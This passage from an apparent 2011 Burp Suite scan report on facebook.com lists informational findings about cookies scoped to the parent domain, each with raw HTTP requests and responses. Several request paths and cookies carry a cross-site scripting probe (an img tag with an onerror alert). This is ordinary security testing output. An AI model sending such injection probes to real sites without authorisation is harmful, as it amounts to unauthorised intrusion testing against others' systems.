Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.181.69
Connection: close
Date: Thu, 05 May 2011 11:43:08 GMT
Content-Length: 30906

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.11. http://www.facebook.com/10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://burp/show/11
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 404 Not Found
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: lsd=hrTlo; path=/; domain=.facebook.com
Set-Cookie: reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.40.55
X-Cnection: close
Date: Thu, 05 May 2011 11:29:43 GMT
Content-Length: 11493

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.12. http://www.facebook.com/10000082482078341583  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /10000082482078341583<img%20src=a%20onerror=alert(1

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /10000082482078341583<img%20src=a%20onerror=alert(1 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 404 Not Found
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.139.31
Connection: close
Date: Thu, 05 May 2011 11:43:13 GMT
Content-Length: 11422

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.13. http://www.facebook.com/10000082482078341583ab0e5e0e0bd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /10000082482078341583<img%20src=a%20onerror=alert(1)>ab0e5e0e0bd

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /10000082482078341583<img%20src=a%20onerror=alert(1)>ab0e5e0e0bd HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 404 Not Found
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.187.55
Connection: close
Date: Thu, 05 May 2011 11:43:11 GMT
Content-Length: 11470

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.14. http://www.facebook.com/1242845259  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /1242845259

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F1242845259; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /1242845259 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; datr=ituyTcnawc6q7VcE0gibPCo2; act=1304613672018%2F1; L=2; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F12; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; wd=1022x1007

Response

HTTP/1.1 404 Not Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F1242845259; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.96.57
X-Cnection: close
Date: Thu, 05 May 2011 11:56:38 GMT
Content-Length: 11260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.15. http://www.facebook.com/1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:
  • reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F12; path=/; domain=.facebook.com
  • reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; path=/; domain=.facebook.com
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://burp/show/12
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; datr=ituyTcnawc6q7VcE0gibPCo2; act=1304613672018%2F1; L=2; reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fhelp%2Fcontact.php%3Fshow_form%3Dcannot_identify%26flow%3Dpw_reset; wd=1022x1007

Response

HTTP/1.1 404 Not Found
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F12; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.102.67
X-Cnection: close
Date: Thu, 05 May 2011 11:56:26 GMT
Content-Length: 11478

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.16. http://www.facebook.com/2008/fbml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /2008/fbml

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F2008%2Ffbml; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /2008/fbml HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 404 Not Found
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F2008%2Ffbml; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.145.67
Connection: close
Date: Thu, 05 May 2011 11:40:11 GMT
Content-Length: 11283

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.17. http://www.facebook.com/AOLrealestate  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /AOLrealestate

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AOLrealestate HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.181.29
Connection: close
Date: Thu, 05 May 2011 11:42:19 GMT
Content-Length: 37726

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.18. http://www.facebook.com/BPAmerica  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /BPAmerica

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /BPAmerica HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.217.127
Connection: close
Date: Thu, 05 May 2011 10:56:36 GMT
Content-Length: 183008

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.19. http://www.facebook.com/DailyFinance  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /DailyFinance

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /DailyFinance HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.168.69
Connection: close
Date: Thu, 05 May 2011 11:42:19 GMT
Content-Length: 197840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.20. http://www.facebook.com/HockeyKen  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /HockeyKen

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FHockeyKen; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HockeyKen HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FHockeyKen; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.195.39
Connection: close
Date: Thu, 05 May 2011 11:42:23 GMT
Content-Length: 79629

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.21. http://www.facebook.com/KickIceForever  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /KickIceForever

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FKickIceForever; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /KickIceForever HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FKickIceForever; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.194.43
Connection: close
Date: Thu, 05 May 2011 11:42:23 GMT
Content-Length: 72255

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.22. http://www.facebook.com/LadyBonesie  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /LadyBonesie

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /LadyBonesie HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.167.61
Connection: close
Date: Thu, 05 May 2011 11:43:11 GMT
Content-Length: 14829

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.23. http://www.facebook.com/Loizza  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
